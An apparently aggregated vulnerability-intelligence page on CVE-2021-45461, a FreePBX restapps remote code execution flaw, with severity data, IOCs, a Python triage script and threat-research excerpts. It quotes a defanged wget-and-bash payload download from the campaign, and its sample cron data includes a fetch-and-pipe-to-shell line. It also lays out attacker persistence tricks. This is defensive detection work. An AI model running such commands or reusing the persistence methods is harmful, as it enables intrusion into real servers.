CVE-2021-45461
Published: 2021-12-22
Priority: P1 · 86 · critical · 9.8 · CVSS 3.1
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW: VulnCheck KEV · Exploited in the wild
EPSS: 21.66% (97.3th percentile)
FreePBX, when restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 is installed, allows remote attackers to execute arbitrary code, as exploited in the wild in December 2021. The fixed versions are 15.0.20 and 16.0.19.
Affected (4 ranges; all four list the same vendor and product, with no version range or fixed version extracted)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sangoma | restapps | — | — |
Detection & IOCs (extracted from sources)
Command observed in the campaign (URL defanged):
`(setsid wget "hxxp://45[.]234[.]176[.]202/new/k.php" -O /var/spool/asterisk/tmp/serv 2>/dev/null >/dev/null; bash /var/spool/asterisk/tmp/serv 2>/dev/null > /dev/null & ) 2>&1`
Detection guidance:
- Look for the web shell parameter 'md5' in HTTP requests to ajax.php on FreePBX/Elastix servers — the web shell authenticates by comparing a user-supplied MD5 hash against a hardcoded value mapped to the victim's public IP.
- Hunt for creation of local user accounts named 'sugarmaint', 'supports', or 'newfpbx' with UID 0 on FreePBX/Asterisk hosts.
- Monitor for crontab entries that fetch and execute k.php from a remote IP every minute — a key persistence indicator for this campaign.
- Detect file writes to /var/lib/asterisk/bin/ for non-standard binaries named 'zen2', 'devnull2', or 'devnull' — these are dropper persistence artifacts.
- Alert on chmod 000 applied to ajax.php or model.php in FreePBX web directories — the dropper does this to clear the way before deploying its own web shell.
- Detect timestamp-forging activity: 'touch <webshell_file> -r <legitimate_file>' in FreePBX web directories, used to blend malicious files with legitimate ones.
- Monitor for the presence of license.php under /var/www/html/admin/modules/freepbx_ha/ — this is a malicious persistence dropper, not a legitimate FreePBX file.
- The malware implants a random junk string in each download to evade hash-based IOC detection — rely on behavioral and path-based detections rather than file hashes alone.
Caveats for IOC use:
- The web shell's MD5 authentication hash is uniquely mapped per victim — the hardcoded hash value will differ across compromised hosts, making it unsuitable as a universal static IOC.
- The malware injects random junk strings into each downloaded payload, meaning file hashes will be unique per download and cannot be relied upon for signature-based detection.
- The dropper forges file timestamps on deployed web shells to match legitimate FreePBX files, so timestamp-based forensic triage will not reliably identify malicious files.
- The web shell is deployed to at least 12 distinct paths under /var/www/html/ — remediation must check all listed locations, not just the primary ajax.php path.
- The dropper echoes the 'rm' command three times without executing it to create the false appearance of self-removal — do not assume the malware is gone based on log entries showing rm commands.
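Added here as an example (not code from the page's sources or from FreePBX): a small Python triage script that applies the host- and request-level indicators above to constructed sample data. The sample passwd, cron, access-log and path lines and the 203.0.113.0/24 addresses are assumptions made for the dry run; on a real host you would feed it /etc/passwd, the asterisk and root crontabs, the Apache access log and a file listing.

```python
import re

# Indicator values taken from the detection list above.
ROOT_ACCOUNT_NAMES = {"sugarmaint", "supports", "newfpbx"}
DROPPER_BINARIES = {"zen2", "devnull2", "devnull"}
PERSISTENCE_FILE = "/var/www/html/admin/modules/freepbx_ha/license.php"

def check_passwd(lines):
    """Return campaign account names that carry UID 0 in /etc/passwd lines."""
    fields = (line.split(":") for line in lines)
    return [f[0] for f in fields if len(f) > 2 and f[2] == "0" and f[0] in ROOT_ACCOUNT_NAMES]

def check_crontab(lines):
    """Return every-minute cron entries that fetch k.php with wget or curl."""
    pat = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+.*\b(?:wget|curl)\b.*k\.php")
    return [l for l in lines if pat.search(l)]

def check_access_log(lines):
    """Return ajax.php requests whose query string carries the 'md5' parameter.
    An access log only shows the query string; an md5 sent in a POST body needs a
    proxy or WAF log that records request bodies."""
    pat = re.compile(r'"(?:GET|POST) [^" ]*ajax\.php\?(?:[^" ]*&)?md5=')
    return [l for l in lines if pat.search(l)]

def check_paths(paths):
    """Return dropper binaries under /var/lib/asterisk/bin/ and the fake license.php."""
    hits = []
    for p in paths:
        head, _, name = p.rpartition("/")
        if (head == "/var/lib/asterisk/bin" and name in DROPPER_BINARIES) or p == PERSISTENCE_FILE:
            hits.append(p)
    return hits

# Constructed sample data for a dry run (not from a real host; 203.0.113.0/24 is TEST-NET).
SAMPLE_PASSWD = ["root:x:0:0:root:/root:/bin/bash", "asterisk:x:498:498::/var/lib/asterisk:/sbin/nologin",
                 "sugarmaint:x:0:0::/root:/bin/bash"]
SAMPLE_CRON = ["0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
               "* * * * * wget -q -O - http://203.0.113.10/new/k.php | sh"]
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Dec/2021:10:00:00 +0000] "POST /admin/ajax.php?md5=0123abcd HTTP/1.1" 200 12',
    '198.51.100.3 - - [06/Dec/2021:10:00:01 +0000] "GET /admin/ajax.php?module=core HTTP/1.1" 200 512']
SAMPLE_PATHS = ["/var/lib/asterisk/bin/module_admin", "/var/lib/asterisk/bin/devnull2",
                "/var/www/html/admin/modules/freepbx_ha/license.php"]

if __name__ == "__main__":
    for name, found in (("passwd", check_passwd(SAMPLE_PASSWD)), ("cron", check_crontab(SAMPLE_CRON)),
                        ("http", check_access_log(SAMPLE_LOG)), ("paths", check_paths(SAMPLE_PATHS))):
        print(f"{name}: {found}")
```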
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-pph6-2c9x-fm9c (ghsa_unreviewed · 2021-12-23): CVE-2021-45461 [CRITICAL]
FreePBX, when restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 is installed, allows remote attackers to execute arbitrary code, as exploited in the wild in December 2021. The fixed versions are 15.0.20 and 16.0.19.
VulnCheck
CVE-2021-45461 [CRITICAL] FreePBX restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 Remote Code Execution
vulncheck · 2021 · CVSS 9.8
FreePBX, when restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 is installed, allows remote attackers to execute arbitrary code, as exploited in the wild in December 2021. The fixed versions are 15.0.20 and 16.0.19.
Affected: Sangoma restapps
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://community.freepbx.org/t/security-issue-potential-rest-phone-apps-rce/80109
- https://www.cve.org/CVERecord?id=CVE-2021-45461
- https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
No detection rules found.
No public exploits indexed.
Fortinet
[CRITICAL] Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
blogs_fortinet · 2026-01-28 · CVSS 9.8
FortiGuard Labs Threat Research
# Unveiling the Weaponized Web Shell EncystPHP
A persistent FreePBX web shell enabling long-term administrative compromise
By Vincent Li | January 28, 2026
Affected Platforms: FreePBX Endpoint Manager v17.0.2.36 – v17.0.3
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment. Incidents were launched in early December last year and propagated via exploitation of the FreePBX v
Checkpoint
CVE-2022-2033 18th July – Threat Intelligence Report
blogs_checkpoint · 2022-07-18
## 18th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 18th July, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
A callback phishing campaign has been observed targeting corporate networks while impersonating known cybersecurity companies – the emails mention an alleged threat in the target’s network, asking them to call the company and let them in the network to investigate. Some suggest the operation is done by the Quantum ransomware ga
Unit42
CVE-2021-45461 [CRITICAL] Digium Phones Under Attack: Insight Into the Web Shell Implant
blogs_unit42 · 2022-07-15 · CVSS 9.8
## Digium Phones Under Attack: Insight Into the Web Shell Implant
By Lee Wei, Yang Ji, Muhammad Umer Khan, Wenjun Hu | Published: July 15, 2022
Tags: Malware, Threat Research, CVE-2021-45461, Digium Asterisk, Mobile, Mobile malware
## Executive Summary
Installing a web shell on a web server is a common approach malware authors take to launch exploits or run commands remotely. In November 2020, the INJ3CTOR3 operation targeted the Sangoma PBX, a popular VoIP PBX system, by installing a web shell on its web server. Recently, Unit 42 observed another operation that targets the Elastix system used in Digium phones. The attacker implants a web shell to exfiltrate data by downloading and executing additional payloads inside the target's Digium phone software (a FreePBX module written in PHP). In terms of the timeline, the web shell appears to be correlated to the remote code execution (RCE) vulnerability CVE-2021-45461 in the Rest Phone Apps (restapps) module.
As of this writing, we have witnessed more than 500,000 uniqu
Threat Intel
CVE-2019-19006 [CRITICAL] INJ3CTOR3
threat_intel · CVSS 9.8
# Threat Actor: INJ3CTOR3
## Description
INJ3CTOR3 is a threat actor first identified in 2020, known for targeting vulnerabilities in VoIP systems, specifically CVE-2019-19006 and CVE-2021-45461. Their operations involve exploiting FreePBX vulnerabilities to deploy PHP web shells for data exfiltration and persistence. The group utilizes tools for SIP server exploitation, including brute-force scripts and authentication bypass techniques. Observations indicate a resurgence of their attack patterns, reflecting historical behaviors while adapting to current vulnerabilities.
References:
- https://community.freepbx.org/t/0-day-freepbx-exploit/80092
- https://community.freepbx.org/t/security-issue-potential-rest-phone-apps-rce/80109
- https://wiki.freepbx.org/display/FOP/2021-12-21+SECURITY%3A+Potential+Rest+Phone+Apps+RCE